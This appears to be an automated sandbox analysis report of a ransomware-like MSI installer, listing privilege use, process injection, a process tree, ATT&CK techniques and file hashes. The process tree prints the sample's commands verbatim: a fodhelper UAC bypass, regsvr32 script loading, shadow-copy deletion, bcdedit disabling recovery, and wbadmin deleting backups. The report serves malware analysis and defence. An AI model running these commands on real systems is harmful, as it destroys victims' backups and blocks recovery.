Token: SeSecurityPrivilege	3496	msiexec.exe
Token: SeTakeOwnershipPrivilege	3496	msiexec.exe
Token: SeLoadDriverPrivilege	3496	msiexec.exe
Token: SeSystemProfilePrivilege	3496	msiexec.exe
Token: SeSystemtimePrivilege	3496	msiexec.exe
Token: SeProfSingleProcessPrivilege	3496	msiexec.exe
Token: SeIncBasePriorityPrivilege	3496	msiexec.exe
Token: SeCreatePagefilePrivilege	3496	msiexec.exe
Token: SeCreatePermanentPrivilege	3496	msiexec.exe
Token: SeBackupPrivilege	3496	msiexec.exe
Token: SeRestorePrivilege	3496	msiexec.exe
Token: SeShutdownPrivilege	3496	msiexec.exe
Token: SeDebugPrivilege	3496	msiexec.exe
Token: SeAuditPrivilege	3496	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3496	msiexec.exe
Token: SeChangeNotifyPrivilege	3496	msiexec.exe
Token: SeRemoteShutdownPrivilege	3496	msiexec.exe
Token: SeUndockPrivilege	3496	msiexec.exe
Token: SeSyncAgentPrivilege	3496	msiexec.exe
Token: SeEnableDelegationPrivilege	3496	msiexec.exe
Token: SeManageVolumePrivilege	3496	msiexec.exe
Token: SeImpersonatePrivilege	3496	msiexec.exe
Token: SeCreateGlobalPrivilege	3496	msiexec.exe
Token: SeBackupPrivilege	1940	vssvc.exe
Token: SeRestorePrivilege	1940	vssvc.exe
Token: SeAuditPrivilege	1940	vssvc.exe
Token: SeBackupPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe
Token: SeTakeOwnershipPrivilege	3004	msiexec.exe
Token: SeRestorePrivilege	3004	msiexec.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

msiexec.exemsedge.exe

pid process

3496 msiexec.exe
3496 msiexec.exe
4436 msedge.exe
4436 msedge.exe
4436 msedge.exe

pid	process
3496	msiexec.exe
3496	msiexec.exe
4436	msedge.exe
4436	msedge.exe
4436	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msiexec.exesihost.exesvchost.exetaskhostw.exeMsiExec.execmd.exemsedge.exe

description	pid	process	target process
PID 3004 wrote to memory of 4048	3004	msiexec.exe	srtasks.exe
PID 3004 wrote to memory of 4048	3004	msiexec.exe	srtasks.exe
PID 3004 wrote to memory of 4028	3004	msiexec.exe	MsiExec.exe
PID 3004 wrote to memory of 4028	3004	msiexec.exe	MsiExec.exe
PID 2316 wrote to memory of 3376	2316	sihost.exe	regsvr32.exe
PID 2316 wrote to memory of 3376	2316	sihost.exe	regsvr32.exe
PID 2332 wrote to memory of 3084	2332	svchost.exe	regsvr32.exe
PID 2332 wrote to memory of 3084	2332	svchost.exe	regsvr32.exe
PID 2472 wrote to memory of 1240	2472	taskhostw.exe	regsvr32.exe
PID 2472 wrote to memory of 1240	2472	taskhostw.exe	regsvr32.exe
PID 4028 wrote to memory of 4248	4028	MsiExec.exe	cmd.exe
PID 4028 wrote to memory of 4248	4028	MsiExec.exe	cmd.exe
PID 4248 wrote to memory of 4436	4248	cmd.exe	msedge.exe
PID 4248 wrote to memory of 4436	4248	cmd.exe	msedge.exe
PID 4436 wrote to memory of 4472	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4472	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4988	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 5000	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 5000	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4176	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4176	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4176	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4176	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4176	4436	msedge.exe	msedge.exe
PID 4436 wrote to memory of 4176	4436	msedge.exe	msedge.exe

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Suspicious use of WriteProcessMemory
PID:2472
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
  2⤵
  - Modifies registry class
  PID:1240
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4444
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4760
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:4268
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4892
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4404
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1636
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:5328
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
        5⤵
        Deletes System State backups
        
        PID:5440
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4528
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4240
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:4160
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5444
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:5568
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4388
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
        5⤵
        Deletes System State backups
        
        PID:1924
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:3516

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
  2⤵
  - Modifies registry class
  PID:3084
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4528
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4836
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:4288
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:364
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4556
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:5136
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
        5⤵
        Deletes System State backups
        
        PID:5336
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:5256
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4544
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4904
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:5648
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:5736
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:5604
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3716
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:5640
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
        5⤵
        Deletes System State backups
        
        PID:1844

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2316
- C:\Windows\system32\regsvr32.exe
  regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea
  2⤵
  - Modifies registry class
  PID:3376
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4560
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4848
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:4240
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4880
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4732
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4152
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:5208
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
        5⤵
        Deletes System State backups
        
        PID:5360
- C:\Windows\system32\cmd.exe
  cmd /c "start fodhelper.exe"
  2⤵
  PID:4536
- - C:\Windows\system32\fodhelper.exe
    fodhelper.exe
    3⤵
    PID:4460
  - - C:\Windows\system32\regsvr32.exe
      "regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55
      4⤵
      PID:4444
    - - C:\Windows\System32\vssadmin.exe
        
        "C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:3644
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:3244
    - - C:\Windows\System32\bcdedit.exe
        
        "C:\Windows\System32\bcdedit.exe" /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4408
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:5536
    - - C:\Windows\System32\wbadmin.exe
        
        "C:\Windows\System32\wbadmin.exe" delete systemstatebackup -quiet
        5⤵
        Deletes System State backups
        
        PID:4656

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\d1d4e29f5fca0c97cd89a4b5134d298.msi
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3496

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3
  2⤵
  PID:4048
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding DA9A8780BF4B97A9F3A263667738C433
  2⤵
  - Modifies extensions of user files
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:4028
- - C:\Windows\System32\cmd.exe
    cmd /c "start microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx^&1^&31382858^&57^&333^&2219041
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://2650bac8b4tjtwhzx.lowso.info/tjtwhzx&1&31382858&57&333&2219041
      4⤵
      Adds Run key to start application
      Enumerates system info in registry
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4436
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffc054b46f8,0x7ffc054b4708,0x7ffc054b4718
        5⤵
        
        PID:4472
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        5⤵
        
        PID:4988
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5000
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
        5⤵
        
        PID:4176
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
        5⤵
        
        PID:4208
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
        5⤵
        
        PID:4224
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5292 /prefetch:8
        5⤵
        
        PID:1636
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
        5⤵
        
        PID:5244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
        5⤵
        
        PID:5300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:1
        5⤵
        
        PID:6084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:8
        5⤵
        
        PID:4660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
        5⤵
        Drops file in Program Files directory
        
        PID:3000
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x7ff79fda5460,0x7ff79fda5470,0x7ff79fda5480
        6⤵
        
        PID:4120
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6496 /prefetch:8
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2020
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4388 /prefetch:8
        5⤵
        
        PID:4392
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4120 /prefetch:8
        5⤵
        
        PID:5656
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:8
        5⤵
        
        PID:5160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5272 /prefetch:2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4536
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:8
        5⤵
        
        PID:4868
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,9125836915562050435,13471930926417639147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6004 /prefetch:8
        5⤵
        
        PID:288

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:2152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1600

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:5776

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:5932

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:6016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:5240

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_E175CA4A23AAAC6461EA10553A74FCBF

Filesize
727B

MD5
dee06844fce8429dc201e12fff4ce3f8

SHA1
44a8dba49bbb4e801a62fb688f3d49603822c7ab

SHA256
fe31e3a5954946ae22ee80d044c59ebaf94dfede793047dccc482eac8614ac01

SHA512
